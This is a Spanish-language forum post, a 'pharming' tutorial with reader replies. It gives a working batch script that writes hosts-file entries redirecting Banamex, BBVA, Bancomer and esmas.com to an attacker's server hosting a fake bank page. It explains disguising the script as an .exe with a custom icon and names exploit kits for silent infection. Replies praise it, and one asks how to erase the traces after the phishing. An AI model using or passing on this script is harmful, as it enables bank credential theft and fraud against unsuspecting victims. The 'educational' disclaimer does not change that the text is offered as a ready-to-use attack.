Manual de Pharming

Bueno, primero que todo necesitaremos saber que es pharming si lo queres poner en practica: aqui les va un poco de definicion.


Ahora que ya sabemos que es pharming y pues phising procederemos a actuar:

Materiales:
El block de notas
Algun pack de iconos
Converter .bat to .exe (es un compilador de archivos batch)

Ahora lo primero que vamos hacer sera abrir el block de notas y escribir:

@echo off
echo 72.9.233.146 www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 72.9.233.146 www.bbva.com >> %windir%\system32\drivers\etc\hosts
echo 72.9.233.146 www.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
echo 72.9.233.146 www.esmas.com >> %windir%\system32\drivers\etc\hosts
exit

Expliquemos un poco,: la direccion ip

72.9.233.146

sera la ip de su hosting donde tengan su scam bancario o de lo que sea(con ip de su hosting me refiero a un hosting con ip dedicada no que hicieron ping a su pagina web y listo ye tengo mi ip por que eso no es asi), entonces esa ip la cambian por la suya, en este caso puse la ip de la pagina web de un juego.
La pagina web que en este caso pusimos

www.banamex.com.mx - www.bbva.com - www.bancomer.com.mx - www.esmas.com

seran las paginas webs a las que entraran nuestras victimas y seran redireccionadas a nuestro scam.
Y la ruta

%windir%\system32\drivers\etc\hosts

lo que hace es llamar al archivo hosts que se encuentra en el directorio de

windows > system32 > drivers > etc

para asi añadirle esas lineas nuestras al archivo hosts.

Ya dejemonos de explicaciones y vamos al grano: Ahora le damos clic en guardar como y le ponen cualquier nombre pero con la extencion .bat por ejemplo (file.bat) y nos salimos ahora abrimos nuestro converter .bat to .exe y compilamos nuestro archivo para que quede en .exe y si quieren le cambian el icono desde el mismo compilador y con esto abremos terminado, ahora provemos: ejecutemos nuestro archivo file.exe y veran que no paso nada a simple vista pero ahora vayan a la siguiente ruta WINDOWS\system32\drivers\etc y abran el archivo hosts con el block de notas y veran nuestras URL`S e IP`S en aquel archivo y eso significara que funciono (cuando ejecuten su archivo file.exe se modificara el archivo hosts, y para desinfectarse solo abran el archivo hosts y borren nuestras URL`S e IP`S que se añadieron y dejamos por defecto la ip 127.0.0.1 y el nombre localhost) o simplemente abran una ventana nueva del internet y escriban una de las direcciones webs que decian en el archivo como por ejemplo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y veran que seran redireccionados a la ip (72.9.233.146) la cual es una pagina web de un juego, y si miran bien la URL se daran cuenta de que nada cambia por que dira lo mismo de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta por eso es tan efectivo estos ataques jeje, y para los que piensan en grande por la net existen varios scripts para infectar PC`S de forma silenciosa como el fire pack lite, ice pack entre otros.

Nota:Este documento fue creado de forma educativa y ni el autor ni ayudantes se hacen responsables por los malos usos que les puedan dar a este documento.

Todos Los Derechos Reservados.TheFidentisEste Documento puede ser distribuido, siempre y cuando el nombre del autor permanezca intacto.

Autor: TheFidentis
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hay alguna manera que automaticamente despues de hacer el phishing se borre la entrada en host porque si no no podria logearse en la pagina de verdad

buen tuto anthrax haver cuando te ayudo en moderacion claro si se puede !! nos bemos buen dia

viejo tutorial todavia me acuerdo cuando lo ley claro  pensando que se podria utilizar un servidor local en la pc esta y haci no sospeche es como un eframe a el sitio verdadero algo como spyware en la pc..

respondo claro que tu puedes modificar esto para que solo se logee determinado tiempo se me olvido ms-dos 

Muy buen material! se agradece!

Buen tuto, nos sera util para muchos. Grax ANTRAx